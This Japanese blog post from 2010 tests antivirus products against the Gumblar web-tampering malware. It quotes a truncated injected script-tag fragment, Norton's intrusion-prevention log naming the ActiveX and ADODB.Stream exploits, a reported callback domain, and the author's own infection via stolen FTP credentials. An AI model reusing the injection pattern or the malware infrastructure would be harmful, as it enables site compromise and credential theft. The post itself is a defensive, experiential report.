ガンブラー(/*Exception*/) vs Norton Internet Security 2010

環境はこんな感じ

いつものサイトへアクセス。

サイト上部に

<script>/*Exception*/ document.write('<script src='+'h@(t(なんとかかんとか

さらにサイト下部にも

<script>/*Exception*/ document.write('<script src='+'h@(t(tなんとかかんとか

という二段構えな改ざんコード埋め込み状態

すくりぷとはするー

おいおいおいおいおい・・・と思ったら

おっ

ちょっと遮断されるまで間があるけど防いでくれてるっぽい。

一応セーフモードで確認してみたけど感染の兆候は無いっぽい。

ノートンさんの活動ログ

2010/01/23 21:37,高レベル,侵入の試みを遮断しました。,遮断しました,対応の必要はありません,MSIE MS MPEG2TuneRequestControl ActiveX Instantiation,http://www.なんとかかんとか/
2010/01/23 21:37,高レベル,侵入の試みを遮断しました。,遮断しました,対応の必要はありません,MSIE ADODB.Stream Object File Installation Weakness,http://www.なんとかかんとか/,
2010/01/23 20:23,情報,侵入防止が有効になりました,検出しました,対応の必要はありません,,,侵入防止
2010/01/23 20:23,情報,侵入防止が 1517 シグネチャを監視しています。ドライバのバージョン: 9.1.2.5,検出しました,対応の必要はありません,,,侵入防止
2010/01/23 20:23,情報,侵入防止エンジンのバージョン: 4.5.0.67 定義セットのバージョン: 20100119.001,検出しました,対応の必要はありません,,,侵入防止

また明日データ通信の端末持って帰ったら他のサイトにもアクセスして試してみます。

/*追記*/

他のサイトも試してみましたがだいじょうぶでした。

サイトのURLで判別しているのではなく、リダイレクト先を見て判断している？ようす？

ちなみに

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】

454 名前： 名無しさん＠お腹いっぱい。 投稿日： 2010/01/23(土) 11:06:41

串通せば感染する。

ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが
Gumblar感染後、forhomessale.ru　の名前解決に失敗してるっぽい、、、

それでもFTPアカウントは窃取されんのかな？

えーっと、ちょうど/*Exception*/が発見されはじめた22日の0時頃

Aviraの実験をやってまして。

まぁ、結果としてはあっけなく/*Exception*/にやられちゃったわけですけど

(ちなみにスタートアップフォルダに作られるファイルが、wwwpos32.exeに変わってました)

その時FFFTPに登録してあったサイトのデータは見事に改ざんされました。

どんなコードが挿入されたかお見せしたいんだけど、保存しておいたファイルをメインPCに移そうとした瞬間

うちのESET Smart Securityがうなりを上げて削除してしまうのでお見せできません＞＜

しょうがないのでスクリーンショットをコピーしてぺたり

(今更ですが)TCP Monitor Plus入れて感染してみるべかな？